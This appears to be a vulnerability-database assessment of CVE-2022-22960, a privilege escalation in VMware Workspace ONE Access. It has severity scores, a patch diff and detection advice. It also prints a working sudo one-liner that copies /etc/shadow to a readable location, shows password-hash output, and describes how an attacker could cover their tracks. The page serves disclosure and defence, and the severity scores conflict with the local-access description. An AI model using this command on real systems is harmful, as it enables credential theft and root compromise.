9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
10 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
0.974 High
EPSS
Percentile
99.9%
VMware Workspace ONE Access, Identity Manager and vRealize Automation contain a privilege escalation vulnerability due to improper permissions in support scripts. A malicious actor with local access can escalate privileges to ‘root’.
Recent assessments:
zeroSteiner at May 23, 2022 1:41pm UTC reported:
There exists a vulnerability within /usr/local/horizon/scripts/publishCaCert.hzn
where a local attacker can invoke the script to make any file world-readable. The script is intended to facilitate certificate management, allowing cert files to be copied into /etc/ssl/certs
which is owned by root. The script can be invoked by the horizon
user without a sudo password.
The script takes two arguments, the first a path to the file to copy, the second the name of the file to write to the destination. The source path argument can be any file, but the destination is only the final component of the path meaning the file will be placed in /etc/ssl/certs
.
A local user running as horizon
(such as from successfully exploiting CVE-2022-22954) can exploit this vulnerability to recover the shadow file by executing:
horizon [ /tmp ]$ sudo /usr/local/horizon/scripts/publishCaCert.hzn /etc/shadow shadow; cat /etc/ssl/certs/shadow
root:$6$Y49xfSabYZeOAAKr$VN0QQ5IsF1swmo7PmW7SMwFpdxo.RuN2W1FEc/gF814JhnC/KU.FEBMVxDx5aRclwcfp8OYjFqzqNxtb3hQPz.:19131:0:60:7:::
bin:x:18964:0:60:7:::
daemon:x:18964:0:60:7:::
messagebus:x:18964:0:60:7:::
systemd-bus-proxy:x:18964:0:60:7:::
systemd-journal-gateway:x:18964:0:60:7:::
systemd-journal-remote:x:18964:0:60:7:::
systemd-journal-upload:x:18964:0:60:7:::
systemd-network:x:18964:0:60:7:::
systemd-resolve:x:18964:0:60:7:::
systemd-timesync:x:18964:0:60:7:::
nobody:x:18964:0:60:7:::
sshd:!:18964:0:60:7:::
rabbitmq:!:18964::60::::
named:!:18964::60::::
postgres:!:18964:0:60:7:::
horizon:!:18964:0:60:7:::
sshuser:$6$1ppozTLmRlrslppH$8XxgQXUSOc.zUBTOkXFdaNR4Cmd2rPhyioLIQ.fiyvdIlMXGvpOWprt8JTZ12NOP1My2xqJpqewfP/BYLqvul1:18964:0:60:7:::
elasticsearch:!:18964::60::::
The file that is written to the /etc/ssl/certs
directory will still be owned by root making the attacker unable to delete it. A crafty attacker would backup an existing certificate file or create a new one, leak the file of their choosing and then overwrite it again with a legitimate certificate to remove the evidence of their leaked file. Users should look for files out of place in this directory, and inspect timestamps and the certificate contents to identify potential exploitation attempts of this vulnerability.
VMWare patched this issue with hotfix HW-154129. The patch for the affected script adds validation to ensure that the argument is a certificate file.
Diff:
< . /usr/local/horizon/scripts/hzn-bin.inc
< openssl x509 -noout -in $CERTFILE 2>/dev/null
<
< if [ $? -ne 0 ]; then
< echo "ERROR: This is not a certificate file"
< exit 1
< fi
<
Assessed Attacker Value: 2
Assessed Attacker Value: 2Assessed Attacker Value: 5
packetstormsecurity.com/files/171918/Mware-Workspace-ONE-Remote-Code-Execution.html
packetstormsecurity.com/files/171918/VMware-Workspace-ONE-Remote-Code-Execution.html
packetstormsecurity.com/files/171935/VMware-Workspace-ONE-Access-Privilege-Escalation.html
cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22960
www.vmware.com/security/advisories/VMSA-2022-0011.html
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
10 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
0.974 High
EPSS
Percentile
99.9%